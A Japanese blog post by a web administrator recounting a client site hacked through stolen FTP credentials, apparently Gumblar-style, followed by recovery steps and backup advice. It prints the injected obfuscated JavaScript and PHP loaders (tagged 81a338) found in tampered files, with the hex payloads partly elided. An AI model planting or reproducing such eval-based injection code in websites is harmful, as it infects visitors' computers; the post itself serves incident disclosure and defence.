WEBサイト改ざん被害

メルです。

かなり仕事を休んでしまったので
「さぁ、仕事!仕事!」と思いきや、
管理しているある企業のサーバーに
不振なFTPアクセスが・・・

アクセス元は、

など・・・。

これはやばいのでは?と思いながら
サーバーの中身を見ると、
なんと大量のファイルが改ざんにあっているではありませんか。

改竄されたページにアクセスすると訪問者のパソコンが
感染し、被害が広まると言うオマケ付き。

改竄されたファイルは、HTMLファイル、JavaScriptファイル、
一部PHPファイルで、<!–81a338–>、/*81a338*/から始まる
JavaScript、iframe などの埋め込みが特徴。

他にも81a338の代わりに0c0896や、ded509などの6桁の
英数字のものもあるようです。

状況から見て、
これは最近非常に被害が増えているパターンで
ガンブラーなどのウイルスやスパイウエアに感染し、
パソコンからFTP情報を搾取され、改竄されている
可能性が高い。

 

 

流石にこれはまずいので、
サイトを閉鎖し、クライアント企業に連絡。

全てのパソコンのウイルスチェックをしてもらい、
サーバー、FTPへのアクセス制限を行い、
全てのパスワードの変更と共に復旧作業に取り掛かることに。

因みに改ざん被害にあったファイルには以下のコードが追加されていました。

 

改ざんされたHTMLファイル

<!--81a338--><script type="text/javascript" language="javascript" >gakqf="s"+"p"+"li"+"t";srkjb=window;fpr="dy";txm=document;rcigwm="0x";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv="17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:58:5c:17:34:17:5b:66:5a:6c
     ・
     ・中略
     ・
5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:58:5c:27:30:1f:20:32:4:1:74:4:1:74"[gakqf](":");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String["fromCharCode"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script><!--/81a338-->

 

改ざんされたJavaScriptファイル

/*81a338*/
ragir="s"+"p"+"li"+"t";negu=window;zwh="dy";vqpoo=document;rauffm="0x";blye=(5-3-1);try{++(vqpoo.body)}catch(xdomas){jioz=false;try{}catch(dhncm){jioz=21;}
if(1){przkl="17:5d:6c:65:5a:6b:60:66:65:17:60:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:
     ・
     ・中略
     ・
2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5d:27:30:1f:20:32:4:1:74:4:1:74"[ragir](":");}negu=przkl;ljy=[];for(cahkv=22-20-2;-cahkv+1374!=0;cahkv+=1){lufim=cahkv;if((0x19==031))ljy+=String["fromCharCode"](eval(rauffm+negu[1*lufim])+0xa-blye);}klc=eval;klc(ljy)}
/*/81a338*/

 

改ざんされたPHPファイル

#81a338#
if(empty($qk)) {
$qk = "<script type=\"text/javascript\" language=\"javascript\" >gakqf=\"s\"+\"p\"+\"li\"+\"t\";srkjb=window;fpr=\"dy\";txm=document;rcigwm=\"0x\";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:
     ・
     ・中略
     ・
4:1:74:4:1:74\"[gakqf](\":\");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String[\"fromCharCode\"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script>";
echo $qk;
}
#/81a338#

 

このサーバーには月商300万円のネットショップが入っていたので
スピード勝負。

結局なんだかんだで復旧までに丸1日かかってしまいましたが(笑

最近、CMSなどの脆弱性をついた攻撃や、
今回のようにパソコンから情報を搾取しての攻撃など、
非常に被害が広まっています。

またWEBサイトにアクセスするだけでも感染するものも
多数あります。

どこか遠い世界の出来事ではなく、
誰もがいつでも感染する可能性があります。

パソコンのセキュリティはしっかりと導入し、
まめにスキャンして、皆さんも気をつけて下さい。

 

 

— 10/3追記 —

 

このタイプの被害にあった場合の対処法は、
81a338で入れ子になっている部分の記述を削除するしかありません。

被害にあっている事に気付くのが遅いと、
数百から数千ものファイルが書き換えられているため、
手動でファイルを開いて削除していたら大変です。
日頃からサーバー内の全ファイルのバックアップを
まめに取っておく事をお勧めします。

バックアップさえあれば、FTPで一括上書きアップロードで対応できます。

 

 

この投稿は役に立ちましたか? 役に立った 役に立たなかった

 

ネットビジネス速報メールマガジン

 

メルのネットビジネス速報では、悪質高額塾などの被害が拡大しないように
新しい悪質販売者の情報が入り次第、速報でお伝えいたします。

Dreamweaver、Fireworks、PhotoshopなどのTipsやチュートリアルの紹介、
最新SEO情報、その他ネットビジネスに関する情報をいち早く配信しています。

お名前(必須)
メールアドレス(必須)

One Response to “WEBサイト改ざん被害”

  1. […] これは前回、WEBサイト改ざん被害の記事でも書きかましたが、 管理しているパソコンからFTPのパスワードを抜き取られて改竄されます。 […]

記事「WEBサイト改ざん被害」にコメントを残す

サブコンテンツ

危険な高額塾

タグ

三橋美仁 ソース BUYMA 大西良幸 ウイルス ソースコード followmatic ソフト ツイッター 秒速で1億円稼ぐ男 クロスアフィリエイト 比較 ボタン アフィ匠 クラック 既得権益 リンクシェイカー 脆弱性 石井匠 株式会社バンザイ 復元 Google Maps getElementByTagName ネットビジネス SmoothScroll.js 個人情報 人物 CGI プラグイン 改竄 スカイプ Windows 伊藤 歩 レンタルサーバー トレンドアフィリエイト ロリポップ エクスプローラー 画像 google ムーバブルタイプ 特定のメールアドレス ぼかし HTML4.0 土屋ひろし 中山秀人 エクスチェンジ postpost Chrome アクセスアップ ネットビジネス大全集 アドセンス office SKナレッジ シャンプー 山下 RSS Includes Pages SEO コピーボタン 切抜き Login LockDown 自己アフィリ ブラクラ バイドゥー アクセス制限 プロファイル 情報商材 Newpost Catch スムーズ RMT ヤフーショッピング 短縮URL High Concept Marketing system 個人情報流出 株式会社WINGOOD サイト改ざん Cash on Wordpress 不労所得の神 ブロック ビジネス 表示 トレンドキーワード テンプレート スマホ EC moza 特権ビジネス document.all tool SyntaxHighlighter レイアウト崩れ テーマ 到達率 関根義光 DOCTYPE 高速ゲーム 株式会社A-ブログレス 大園式転売塾 エディタ せどり もざ 管理画面 KMS認証 RSS ヤフオク 権利収入 詐欺 wordpress Adobe wp-login.php パズル バナー 大園転売塾 android CS6 Line フレンドシップメール ブロックポリシー 賢威 @PAGES インペリアルゴールド 無料 force puzzle カスタマイズ css iphone グラデーション タスクバー ECサイト MasterCollection 株式会社SRシステム 池田純矢 ワードプレス やしろ塾 サンタ インターネット フォローマティック アレックス ライブチャット 伊藤塾 メモ 株式会社SRシステム ドメイン ネットガレージ Agency Business Youtube DTD 登録禁止 球体 PHP 無料オファー ランキング バックアップ ping送信 インフォトップ 立体 与沢翼 アフィリエイト Windows 7 getElementById 与沢翼×蝶乃舞 インターネットビジネススクール 詐欺組織 量産 秀吉塾天下統一 管理ツール 宮田麗花 セキュリティ KMSpico JavaScript ヤフー デスクトップ 伊藤 虎太郎 twitter 蝶乃舞 小笠原健一 WEB ネットビジネス最後の楽園 MT 日本語入力変換ソフト 配布 クラウド変換 IBS 改ざん 原田真 explorer タイガーウイング 不正送信 functions.php やしろひろたみ アレックス式ネオせどりスクール CS5 マイクロソフト 自己アフィリエイト XHTML エキスパートメール FireWorks ブラシ Thunderbird 株式会社ニュース ウインドウ 加工 Extension Manager ブルートフォースアタック LinkShaker 株式会社Free Agent Style メルマガ配信システム 無断送信 ネオヒルズアカデミー Tiger-Wing 北川 雅嗣 ツール wpXサーバー BBIZ 転売大園塾 大園麗花 Yahoo 新井浩 ブラウザ ユーチューブマニアクス2017 流出 ping クラウド入力機能 ざくざく君 滑らか 出店料 高額塾 インターネットエクスプローラー 上位表示 伊藤虎太郎 がら空きビジネス ライオンアフィリエイト マルウエア Ban Hammer 定型文 ネットショップ 短縮URLツール 音量アイコン 関根塾 モザイク 優先順位 副業術 クリックランキング トラフィック IE Google Maps API バイマ アンダーグラウンドメソッド 自動 MovableTYpe 掲示板 レイアウト IP 81a338 ハート ネットゲーム 百度 加藤 秀吉 レタープレス PPC レビュー Internet Explorer 村上省吾 不正アクセス 久積篤史 WP FTP 自動化 マニュアル 申請金ビジネス スクロール 固定ページ ファビコン 放射線 スタイルシート プロモーション Baidu Wordpress Content Slide Favicon 感染 html Diamond Affiliate Masters Program 切り抜き Firefox .htaccess 背景 ライン YouTube Maniax 2017 アンダーグラウンドアフィリエイトクラブ アイコン

アーカイブ

エステトラブル

このページの先頭へ